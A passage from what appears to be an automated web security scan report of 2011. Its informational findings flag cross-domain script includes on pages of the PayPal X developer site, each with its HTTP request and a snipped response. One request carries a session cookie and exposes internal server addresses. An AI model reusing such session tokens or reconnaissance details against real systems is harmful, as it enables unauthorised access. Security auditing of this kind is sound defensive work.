Date: Fri, 12 Aug 2011 13:50:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323232313b31342c323130303b31342c323036333b31342c323038343b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b31342c323035343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:54 GMT; Path=/
Vary: User-Agent
JP: D=123225 t=1313157053998686
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.85. https://www.x.com/community/ppx/xspaces/toolkits

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/toolkits

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces/toolkits HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:54 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323235313b31342c323232313b31342c323038343b31342c323130303b31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:54 GMT; Path=/
Vary: User-Agent
JP: D=92295 t=1313157054626427
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.86. https://www.x.com/community/ppx/xspaces/web_checkout

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/web_checkout

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces/web_checkout HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:42 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035343b31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b31342c323035333b31342c323030373b31342c323031343b31342c323031313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:43 GMT; Path=/
Vary: User-Agent
JP: D=247512 t=1313157042801714
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.87. https://www.x.com/community/ppx/xspaces/web_checkout/nvp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/web_checkout/nvp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces/web_checkout/nvp HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:44 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035373b31342c323236363b31342c323035343b31342c323232343b31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b31342c323035333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:45 GMT; Path=/
Vary: User-Agent
JP: D=141801 t=1313157044894483
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.88. https://www.x.com/community/ppx/xspaces/web_checkout/soap

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/web_checkout/soap

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces/web_checkout/soap HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:46 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036313b31342c323035373b31342c323232343b31342c323236363b31342c323035343b31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:46 GMT; Path=/
Vary: User-Agent
JP: D=130212 t=1313157046417943
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.89. https://www.x.com/community/xcommerce-blogs

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/xcommerce-blogs?view=blog HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/index.jspa
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030383b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:38:42 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323237363b31342c323030383b; Expires=Sun, 11-Sep-2011 13:38:43 GMT; Path=/
Vary: User-Agent
JP: D=97775 t=1313156323515835
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.90. https://www.x.com/community/xcommerce-blogs/blog/2011/06/07/adobe-to-arm-xcommerce-retailers-with-customer-data-to-help-them-sell-more

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/06/07/adobe-to-arm-xcommerce-retailers-with-customer-data-to-help-them-sell-more

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/xcommerce-blogs/blog/2011/06/07/adobe-to-arm-xcommerce-retailers-with-customer-data-to-help-them-sell-more HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:27 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323037333b31342c323232363b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c353939353b33382c363039373b33382c363233383b33382c363238353b33382c363030363b33382c363133383b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:28 GMT; Path=/
Vary: User-Agent
JP: D=114399 t=1313157088244606
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.91. https://www.x.com/community/xcommerce-blogs/blog/2011/06/08/how-may-we-serve-you-better

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/06/08/how-may-we-serve-you-better

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/xcommerce-blogs/blog/2011/06/08/how-may-we-serve-you-better HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:27 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323037333b31342c323232363b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363030363b33382c363233383b33382c363039373b33382c363133383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:27 GMT; Path=/
Vary: User-Agent
JP: D=132206 t=1313157087884897
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.92. https://www.x.com/community/xcommerce-blogs/blog/2011/06/26/are-you-headed-to-fowa

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/06/26/are-you-headed-to-fowa

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/xcommerce-blogs/blog/2011/06/26/are-you-headed-to-fowa HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:26 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323232363b31342c323030323b31342c323037333b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363039373b33382c363133383b33382c363233383b33382c363330313b33382c363238353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:27 GMT; Path=/
Vary: User-Agent
JP: D=143677 t=1313157087084685
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.93. https://www.x.com/community/xcommerce-blogs/blog/2011/07/04/paypal-x-developer-challenge-for-android-vote-now-for-peoples-choice-award

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/07/04/paypal-x-developer-challenge-for-android-vote-now-for-peoples-choice-award

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/xcommerce-blogs/blog/2011/07/04/paypal-x-developer-challenge-for-android-vote-now-for-peoples-choice-award HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:25 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030323b31342c323037333b31342c323232363b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363133383b33382c363233383b33382c363330313b33382c363238353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:26 GMT; Path=/
Vary: User-Agent
JP: D=99334 t=1313157086694004
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.94. https://www.x.com/community/xcommerce-blogs/blog/2011/07/18/our-infrastructure-plans

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/07/18/our-infrastructure-plans

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/xcommerce-blogs/blog/2011/07/18/our-infrastructure-plans HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:25 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030323b31342c323232363b31342c323037333b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363233383b33382c363330313b33382c363238353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:26 GMT; Path=/
Vary: User-Agent
JP: D=79734 t=1313157086409698
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.95. https://www.x.com/community/xcommerce-blogs/blog/2011/07/28/xcommerce-innovate-developer-conference-2011--registration-open

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/07/28/xcommerce-innovate-developer-conference-2011--registration-open

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/xcommerce-blogs/blog/2011/07/28/xcommerce-innovate-developer-conference-2011--registration-open HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:25 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030323b31342c323037333b31342c323232363b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:26 GMT; Path=/
Vary: User-Agent
JP: D=108461 t=1313157085908464
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.96. https://www.x.com/community/xcommerce-blogs/blog/2011/08/02/winners-of-paypals-third-developer-challenge-revealed

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/08/02/winners-of-paypals-third-developer-challenge-revealed

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/xcommerce-blogs/blog/2011/08/02/winners-of-paypals-third-developer-challenge-revealed HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:24 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030323b31342c323232363b31342c323037333b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:25 GMT; Path=/
Vary: User-Agent
JP: D=96364 t=1313157085618096
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.97. https://www.x.com/community/xcommerce-blogs/blog/tags/adobe

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/tags/adobe

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/xcommerce-blogs/blog/tags/adobe HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:31 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=64900 t=1313157092486237
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.98. https://www.x.com/community/xcommerce-blogs/blog/tags/andriod

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/tags/andriod

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/xcommerce-blogs/blog/tags/andriod HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:29 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=58771 t=1313157090149552
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.99. https://www.x.com/community/xcommerce-blogs/blog/tags/apps

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/tags/apps

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/xcommerce-blogs/blog/tags/apps HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=109572 t=1313157089606900
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.100. https://www.x.com/community/xcommerce-blogs/blog/tags/challenge

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/tags/challenge

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/xcommerce-blogs/blog/tags/challenge HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=58835 t=1313157089118525
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.101. https://www.x.com/community/xcommerce-blogs/blog/tags/developer

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/tags/developer

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/xcommerce-blogs/blog/tags/developer HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:27 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=80688 t=1313157088773338
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.102. https://www.x.com/community/xcommerce-blogs/blog/tags/developer_network

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/tags/developer_network

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/xcommerce-blogs/blog/tags/developer_network HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
